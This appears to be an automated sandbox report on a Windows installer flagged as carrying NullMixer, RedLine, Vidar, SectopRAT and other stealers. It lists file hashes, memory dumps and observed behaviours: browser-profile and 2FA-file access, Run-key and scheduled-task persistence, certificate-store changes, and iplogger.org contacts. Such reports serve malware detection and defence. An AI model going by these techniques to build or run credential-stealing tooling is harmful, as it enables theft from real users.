SHA512 6d23c8f73645bb2c6860dda462dafe443ab98b32e11be3ea808c92ec84fa706da36dc19c595145d76528ed314a4119caaa3e085438ec0ffe7a9cced4f8b36ddc

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\CrashpadMetrics-active.pma

MD5 9a31b075da019ddc9903f13f81390688
SHA1 d5ed5d518c8aad84762b03f240d90a2d5d9d99d3
SHA256 95cf4025babcd46069b425449c98ed15d97d364b2461417caa9aa0c13cb372e1
SHA512 a04726a429ae727d685f0836327c625d2f18d6327253216a9a31265a324b68b06bec4e7f1b744d261a0e67fa0a90c43719aeda9d2998f42525b0ff5640c7bf1e

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad\settings.dat

MD5 73d076263128b1602fe145cd548942d0
SHA1 69fe6ab6529c2d81d21f8c664da47c16c2e663ae
SHA256 f2dd7199b48e34d54ee1a221f654ad9c04d8b606c02bdbe77b33b82fb2df6b29
SHA512 e371083407ee6a1e3436a3d1ea4e6a84f211c6ad7c501f7a09916a9ada5b50a39dcb9e8be7a4dee664ea88ec33be8c6197c2f0ac2eabe3c0691bc9d0ed4e415d

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Local State

MD5 fdc7bea6a36bb1cb2854aabb274db951
SHA1 7dd44a949762b9fb990f798c2df8238d8cf75b21
SHA256 7d1ebfa1108c3826ab40627060d1b3f67a36aea8b1e10c590783822862f16e93
SHA512 2751e0010301b4a415af57319cce4ca28ff55ff96e5d95883829705b0a4b916a94570b938eb51c60623f70197c030e8c86d4b4cba3d3daafa38345895c8cfd47

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Variations

MD5 961e3604f228b0d10541ebf921500c86
SHA1 6e00570d9f78d9cfebe67d4da5efe546543949a7
SHA256 f7b24f2eb3d5eb0550527490395d2f61c3d2fe74bb9cb345197dad81b58b5fed
SHA512 535f930afd2ef50282715c7e48859cc2d7b354ff4e6c156b94d5a2815f589b33189ffedfcaf4456525283e993087f9f560d84cfcf497d189ab8101510a09c472

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\segmentation_platform\ukm_db

MD5 3979944f99b92e44fa4b7dbcb6ee91c2
SHA1 df2161c70a820fe43801320f1c25182f891261a4
SHA256 001d755b2b560945440023bf4ebfbda797cf5106419ac7dd270924b322f3ecf3
SHA512 358e6dee698a63c2490c2fb5206516766fd8ace8f3d523509c29ff76aa6a984cb6381468f15bb4b9c084d9a470298b4cc11b0970e671ce0316243069ac4c8590

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\ShaderCache\index

MD5 623219f1ab995d4382d51862e296993e
SHA1 ab714b5455c3a03280ede906b0341270e5e2b4c3
SHA256 e50e0bfc2a799dd9fe24d78ab3838d53b4369a435b883918876435c47acf9a78
SHA512 cf7ea8ed4c3584195803b511b9034695c7ee18d133ed63f51da5e407cc87a90905a2e6264116f67ddb4d0ccc2fff634521906eb04d46250930a6cc19929fd9aa

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Last Version

MD5 ef48733031b712ca7027624fff3ab208
SHA1 da4f3812e6afc4b90d2185f4709dfbb6b47714fa
SHA256 c9ce8dbbe51a4131073db3d6ceef1e11eaca6308ad88a86125f221102d2cee99
SHA512 ce3a5a429e3796977a8019f47806b8c0671b597ead642fcbfbe3144e2b8112d35a9f2250896b7f215d237d0d19c5966caf3fe674165a6d50e14cb2b88c892029

memory/1516-1380-0x0000000000B70000-0x0000000000C4D000-memory.dmp

memory/2968-1441-0x0000000001430000-0x000000000143E000-memory.dmp

memory/2968-1442-0x0000000001460000-0x0000000001472000-memory.dmp

memory/4464-1453-0x0000000009330000-0x00000000093BC000-memory.dmp

memory/4464-1454-0x0000000008220000-0x000000000823E000-memory.dmp

memory/1428-1455-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1828-1458-0x0000000004A40000-0x0000000004A76000-memory.dmp

memory/1828-1461-0x00000000050F0000-0x0000000005718000-memory.dmp

memory/1428-1462-0x00000000055E0000-0x0000000005BF8000-memory.dmp

memory/1428-1463-0x0000000005070000-0x0000000005082000-memory.dmp

memory/1428-1464-0x00000000050D0000-0x000000000510C000-memory.dmp

memory/1828-1465-0x0000000005870000-0x0000000005892000-memory.dmp

memory/1428-1466-0x0000000005110000-0x000000000515C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ttbjl2fr.sfy.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1828-1472-0x0000000005910000-0x0000000005976000-memory.dmp

memory/1828-1474-0x0000000005980000-0x00000000059E6000-memory.dmp

memory/1828-1480-0x0000000005B30000-0x0000000005E84000-memory.dmp

memory/1428-1481-0x0000000005380000-0x000000000548A000-memory.dmp

memory/1828-1482-0x0000000005FC0000-0x0000000005FDE000-memory.dmp

memory/1828-1484-0x0000000074CC0000-0x0000000074D0C000-memory.dmp

memory/1828-1483-0x0000000006590000-0x00000000065C2000-memory.dmp

memory/1828-1494-0x00000000065D0000-0x00000000065EE000-memory.dmp

memory/1828-1495-0x00000000071D0000-0x0000000007273000-memory.dmp

memory/1828-1497-0x0000000007930000-0x0000000007FAA000-memory.dmp

memory/1828-1498-0x00000000072E0000-0x00000000072FA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e443ee4336fcf13c698b8ab5f3c173d0
SHA1 9bf70b16f03820cbe3158e1f1396b07b8ac9d75a
SHA256 79e277da2074f9467e0518f0f26ca2ba74914bee82553f935a0ccf64a0119e8b
SHA512 cbf6f6aa0ea69b47f51592296da2b7be1180e7b483c61b4d17ba9ee1a2d3345cbe0987b96f4e25de1438b553db358f330aad8a26e8522601f055c3d5a8313cdd

memory/1828-1504-0x0000000007360000-0x000000000736A000-memory.dmp

memory/1828-1505-0x0000000007560000-0x00000000075F6000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 56a4f78e21616a6e19da57228569489b
SHA1 21bfabbfc294d5f2aa1da825c5590d760483bc76
SHA256 d036661e765ee8fd18978a2b5501e8df6b220e4bca531d9860407555294c96fb
SHA512 c2c3cd1152bb486028fe75ab3ce0d0bc9d64c4ca7eb8860ddd934b2f6e0140d2c913af4fa082b88e92a6a6d20fd483a1cb9813209f371a0f56374bc97d7f863b

memory/1828-1516-0x00000000074E0000-0x00000000074F1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 4df1f8c317d3d33cdc2dfebcbc885d1a
SHA1 abdfa86349ad80655137c78c7febf9d541921550
SHA256 c0f99364290d48d014583bce813ac08562a0e6bc76e3312ae0277ef9e7340cab
SHA512 d448c472372b1e639746d9d6ba23946001a7856b8e0ef1dc2a3f18321bad2d9d2e6a925736c76dd5c1eb77ce698631a900106360360bdf1a00dbf6fcd5264cd1

memory/1828-1522-0x0000000007510000-0x000000000751E000-memory.dmp

memory/1828-1523-0x0000000007520000-0x0000000007534000-memory.dmp

memory/1828-1524-0x0000000007620000-0x000000000763A000-memory.dmp

memory/1828-1525-0x0000000007600000-0x0000000007608000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 0e00900d659ac243044b597cd7c30c69
SHA1 b875c0ef5a85ec00b53c828b3116d81c70d6de6f
SHA256 c774e13a4f914b797aa80e5f0532035b869f256a4b25b5481a8fe6f236bd81cf
SHA512 400ec5693c17a7b11e74ff3baf6e1ed8ec95a6d7c1c4a673e0aa78ee958c6a205fdd549cf2eaf5aed808c46f3958156cf6fcdf9529026de882b50cea814c6822

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 0769ac90a2c4d32e1062e8b25fabffdd
SHA1 5197d5b2fd40340efb5f4ff4516d905b7348a7d6
SHA256 7bf1c7f661ce582ebe1c9668d3a22a47e5cee9e9c23415a70bac3206e9698614
SHA512 9fa54f33976e9b41ed4af119409269038ed04946260df1ea2d0d916b9d0c53912d94f627b377f13b2ba3372a5de756c87090c6bce3cb6488911f7ff0af25ca6a

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 be0b4b1c809dc419f44b990378cbae31
SHA1 5c40c342e0375d8ca7e4cc4e1b81b7ef20a22806
SHA256 530bd3b9ec17f111b0658fddeb4585cd6bf6edb1561bdebd1622527c36a63f53
SHA512 5ce316cfe5e25b0a54ceb157dee8f85e2c7825d91a0cd5fae0500b68b85dd265903582728d4259428d2e44b561423dac1499edcf0606ac0f78e8485ce3c0af24

memory/6020-1571-0x0000000000A90000-0x0000000000A96000-memory.dmp

memory/5188-1573-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5188-1576-0x00000000010E0000-0x0000000001100000-memory.dmp

memory/5188-1575-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5188-1578-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5188-1581-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5188-1579-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5188-1577-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5188-1580-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5188-1583-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5188-1584-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5188-1613-0x0000000140000000-0x0000000140786000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 4bc8a3540a546cfe044e0ed1a0a22a95
SHA1 5387f78f1816dee5393bfca1fffe49cede5f59c1
SHA256 f90fcadf34fbec9cabd9bcfdea0a63a1938aef5ea4c1f7b313e77f5d3f5bbdca
SHA512 e75437d833a3073132beed8280d30e4bb99b32e94d8671528aec53f39231c30476afb9067791e4eb9f1258611c167bfe98b09986d1877ca3ed96ea37b8bceecf

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-25 09:33

Reported

2024-11-25 09:36

Platform

win7-20241010-en

Max time kernel

59s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Vidar

stealer vidar

Vidar family

vidar

Vidar Stealer

stealer

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\e4b2f18fb52218.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\e4b2f18fb52218.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\08240101651be7e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\08240101651be7e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\f34b9ab9db6d16.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\f34b9ab9db6d16.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\453c5fa76a849.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\453c5fa76a849.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\1710990cbc64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\1710990cbc64.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\1710990cbc64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\1710990cbc64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\1710990cbc64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\08240101651be7e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\08240101651be7e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A

Reads user/profile data of web browsers

spyware stealer

Accesses 2FA software files, possible credential harvesting

spyware stealer

Adds Run key to start application

persistence

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\08240101651be7e1.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.db-ip.com N/A N/A
N/A api.db-ip.com N/A N/A

Looks up geolocation information via web service

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1392 set thread context of 2772 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\1710990cbc64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winnetdriv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\f34b9ab9db6d16.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\1710990cbc64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\e4b2f18fb52218.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\08240101651be7e010.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\453c5fa76a849.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\e4b2f18fb52218.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\e4b2f18fb52218.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7493EA61-AB10-11EF-8E0F-52DE62627832} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [value omitted] C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\e4b2f18fb52218.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\e4b2f18fb52218.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [value omitted] C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\e4b2f18fb52218.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
